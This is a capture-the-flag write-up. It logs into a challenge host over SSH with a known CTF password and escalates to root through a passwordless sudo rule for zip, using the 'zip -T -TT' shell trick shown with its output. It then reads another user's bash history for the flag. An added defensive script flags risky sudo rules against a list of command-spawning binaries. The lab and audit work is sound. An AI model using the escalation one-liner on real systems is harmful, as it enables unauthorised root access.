Dead Men Tell No Tales

Problem

Created by: syyntax

We've discovered a remote system used by DEADFACE. We're not sure what the password is, but we know Donnell Aulner has an account on that machine. We believe DEADFACE has stored valuable information on this machine. The flag exists on the machine in the format flag{some-text-here}. Submit the flag as flag{flag-goes-here}.

Username: dracula

deadmen.deadface.io:22

Solution

We use the password we obtained in another challenge to log in as the dracula user.

That gives us the user dracula and the password L3t_m3_in to log in.

└─$ ssh dracula@deadmen.deadface.io                                                       1 
dracula@deadmen.deadface.io's password: 
dracula@3d468a1d2ddc:~$ 
dracula@3d468a1d2ddc:~$ ls -lah /home
total 28K
drwxr-xr-x 1 root      root      4.0K Sep 19 01:37 .
drwxr-xr-x 1 root      root      4.0K Oct 18 04:02 ..
drwxr-xr-x 2 d34th     d34th     4.0K Sep 19 01:37 d34th
drwxr-xr-x 1 dracula   dracula   4.0K Sep 19 01:44 dracula
drwxr-xr-x 1 spookyboi spookyboi 4.0K Sep 19 01:39 spookyboi
dracula@3d468a1d2ddc:/home$ cd /home/spookyboi/
dracula@3d468a1d2ddc:/home/spookyboi$ ls -la
total 28
drwxr-xr-x 1 spookyboi spookyboi 4096 Sep 19 01:39 .
drwxr-xr-x 1 root      root      4096 Sep 19 01:37 ..
-rw------- 1 spookyboi spookyboi   93 Sep 19 01:39 .bash_history
-rw-r--r-- 1 spookyboi spookyboi  220 Sep 19 01:37 .bash_logout
-rw-r--r-- 1 spookyboi spookyboi 3771 Sep 19 01:37 .bashrc
-rw-r--r-- 1 spookyboi spookyboi  807 Sep 19 01:37 .profile
dracula@3d468a1d2ddc:/home/spookyboi$ cat .bash_history 
cat: .bash_history: Permission denied

We find an interesting file, but we do not have permission to read it. Let's look for a way to escalate.

dracula@3d468a1d2ddc:/home/spookyboi$ sudo -l
Matching Defaults entries for dracula on 3d468a1d2ddc:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dracula may run the following commands on 3d468a1d2ddc:
    (ALL) NOPASSWD: /usr/bin/zip

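The user can run zip through sudo as any user without a password. The -T option makes zip test the archive and -TT sets the command used for that test, so zip ends up running sh as root. We escalate privileges with the command: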

sudo zip algo /etc/hosts -T -TT 'sh #'

dracula@3d468a1d2ddc:/home/spookyboi$ sudo zip algo /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 34%)
# id
uid=0(root) gid=0(root) groups=0(root)
# /bin/bash
root@3d468a1d2ddc:/home/spookyboi#

We are root now! Time to go after more information.

root@3d468a1d2ddc:/home/spookyboi# cat .bash_history 
cd ~
echo "flag{c4c089cdbe222b9360880a07c987b581c6f51609}" > flag.txt
rm flag.txt 
exit
exit
root@3d468a1d2ddc:/home/spookyboi# 

The flag was inside the file: the history recorded the echo command that wrote it before flag.txt was deleted.

flag{c4c089cdbe222b9360880a07c987b581c6f51609}
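
From the defender's side, the sudo rule that made this escalation possible can be caught by reviewing sudo -l output for each account. The script below is an added example, not part of the original write-up; the binaries listed besides zip and the backup-report rule are assumptions made for the illustration.

```shell
#!/bin/sh
# Added example (not from the original write-up): audit `sudo -l` output.

# Illustrative, non-exhaustive list of programs that can launch other commands
# by design. zip is the case on this page; the other names are assumptions
# added for the example.
RISKY_BINARIES="zip tar find vim less awk env"

# Reads `sudo -l` output on stdin, prints one finding per risky NOPASSWD rule.
# Returns 1 if anything was flagged, 0 otherwise.
audit_sudo_rules() {
    findings=0
    while IFS= read -r line; do
        case $line in
            *NOPASSWD:*) ;;
            *) continue ;;
        esac
        runas=${line#*\(}; runas=${runas%%\)*}      # text inside "(...)"
        cmds=${line#*NOPASSWD:}
        old_ifs=$IFS; IFS=,; set -f                 # split the rule list on commas
        for cmd in $cmds; do
            cmd=${cmd#"${cmd%%[! ]*}"}              # trim leading spaces
            cmd=${cmd%% *}                          # drop any argument spec
            if [ "$cmd" = "ALL" ]; then
                echo "CRITICAL runas=$runas cmd=ALL (unrestricted passwordless sudo)"
                findings=1
                continue
            fi
            case " $RISKY_BINARIES " in
                *" ${cmd##*/} "*)
                    echo "HIGH runas=$runas cmd=$cmd (can run arbitrary commands as the target user)"
                    findings=1 ;;
            esac
        done
        IFS=$old_ifs; set +f
    done
    return "$findings"
}

# Sample input: the rule shown on this page plus one constructed benign rule
# (backup-report is a hypothetical script).
sample_sudo_l() {
    cat <<'EOF'
User dracula may run the following commands on 3d468a1d2ddc:
    (ALL) NOPASSWD: /usr/bin/zip
    (root) NOPASSWD: /usr/local/bin/backup-report
EOF
}

sample_sudo_l | audit_sudo_rules || true
```

On a real host the input would be `sudo -l -U <user>` run by an administrator for each account; a flagged rule should be removed or replaced with a purpose-built wrapper that takes no user-controlled options.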
